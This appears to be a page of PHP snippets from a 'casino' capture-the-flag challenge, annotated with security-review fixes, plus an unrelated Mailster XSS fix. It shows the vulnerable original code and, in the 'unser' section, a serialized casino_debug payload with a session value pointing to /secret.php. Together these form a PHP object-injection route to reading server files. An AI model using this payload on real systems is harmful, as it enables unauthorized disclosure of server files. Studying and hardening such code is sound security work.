random

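/**
 * Build a string of random ASCII letters.
 *
 * NOTE(review): rand() is not a cryptographically secure generator. Do not use
 * the result for passwords, tokens, session identifiers or anything else an
 * attacker must not be able to predict; use random_int() (PHP 7+) for those.
 *
 * @param int $length Number of characters to generate; coerced to an integer.
 * @return string Exactly $length characters drawn from a-z and A-Z.
 */
function getrandomstring($length)
{
    // The alphabet is still written to the global $template, as the original
    // did, in case other code reads it.
    global $template;
    $template = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";

    settype($length, "integer");
    $rndstring = "";
    $last = strlen($template) - 1;

    // "<" rather than "<=": the original loop ran $length + 1 times and so
    // returned one character more than requested.
    for ($a = 0; $a < $length; $a++) {
        $rndstring .= $template[rand(0, $last)];
    }

    return $rndstring;
}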

unser

O:12:"casino_debug":1:{s:3:"var";s:3:"bet";}array(2) { ["path"]=> string(23) "/var/www/html/index.php" ["bet"]=> string(27) "ÄÊB8 ¹#‚ ÌPšou„›/secret.php" }

bet

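// Record the running script and the player's bet in the session.
// (Array keys use plain ASCII quotes; the typographic quotes in the listing
// are not string delimiters in PHP.)
$_SESSION['path'] = __FILE__;

// NOTE(review): both POST fields are stored without validation. md5(..., TRUE)
// returns the raw 16-byte digest rather than hex, so the stored value is
// "<16 raw bytes>/<bet as submitted>" and is largely chosen by the client.
// Validate the bet (for example as a bounded integer) before storing it, and
// never let this session value be used as a file name or path.
$_SESSION['bet'] = md5($_POST['guess'], TRUE) . "/" . $_POST['bet'];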

casino_debug

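/**
 * Debug helper: on unserialization it dumps the session and prints the file
 * whose path is stored under $_SESSION['path'].
 *
 * NOTE(review): __wakeup() runs automatically whenever an instance is
 * unserialized, and $var is restored from the serialized data, so $var must be
 * treated as untrusted input. The original used it unchecked as the session
 * key whose value is handed to file_get_contents(), which let serialized data
 * choose which session entry is read as a file path. Both the session dump and
 * the file echo disclose server state; this class should not be reachable in
 * production at all.
 */
class casino_debug
{
    public $var = "path";

    public function __wakeup()
    {
        // Only the default key is honoured; any other value restored from
        // serialized data is ignored without producing output.
        if ($this->var !== "path") {
            return;
        }

        var_dump($_SESSION);

        // Skip the read when the session entry is missing or not a string.
        if (isset($_SESSION[$this->var]) && is_string($_SESSION[$this->var])) {
            echo file_get_contents($_SESSION[$this->var]);
        }
    }
}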

unserialize

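// NOTE(review): unserialize() on a client-supplied cookie is unsafe. The cookie
// is fully controlled by the client, and unserializing it instantiates objects
// and runs their magic methods (__wakeup, __destruct). Prefer exchanging plain
// data with json_decode(); if serialized data must be kept, pass
// ['allowed_classes' => false] (PHP 7+) and authenticate the cookie with an
// HMAC checked via hash_equals() before decoding it.
// (The array key uses plain ASCII quotes; the typographic quotes in the
// listing are not string delimiters in PHP.)
unserialize(base64_decode($_COOKIE['debug']));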

RAND

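// Unfair :(
// rand() returns an int, while $_POST values arrive as strings (or arrays),
// so the strict comparison below is never true and the "win" branch cannot be
// reached through this check.
// NOTE(review): rand() is not a cryptographically secure generator and should
// not be what guards access to a secret file in any case.
if (rand() === $_POST['guess']) {
    echo "You win:" . file_get_contents("secret.php");
} else {
    echo "You lose :)";
}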

PHP index.php

<?php session_start(); if ($_GET[‘source’]){ highlight_file(__FILE__); exit(); } class casino_debug { public $var = "path"; public function __wakeup(){ var_dump($_SESSION); echo file_get_contents($_SESSION[$this->var]); } } if (!empty($_GET[‘action’]) && $_GET[‘action’] == "debug") { echo base64_decode($_COOKIE[‘debug’]); unserialize(base64_decode($_COOKIE[‘debug’])); exit(); } if (!empty($_GET[‘action’]) && $_GET[‘action’] == "bet"… Continuar leyendo

code-6

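<h2 class="componentheading mailsterUnsubscriberHeader">Unsubscription</h2>
<div class="contentpane">
    <div id="mailsterContainer">
        <div id="mailsterUnsubscriber">
            <?php
            // The message is taken straight from the query string, so it is
            // HTML-escaped before output; echoing it raw would let a crafted
            // link inject markup or script into this page (reflected XSS).
            // A missing or non-string parameter renders as an empty message.
            ?>
            <div id="mailsterUnsubscriberDescription"><?php echo htmlspecialchars(isset($_GET['mes']) && is_string($_GET['mes']) ? $_GET['mes'] : '', ENT_QUOTES, 'UTF-8'); ?></div>
        </div>
    </div>
</div>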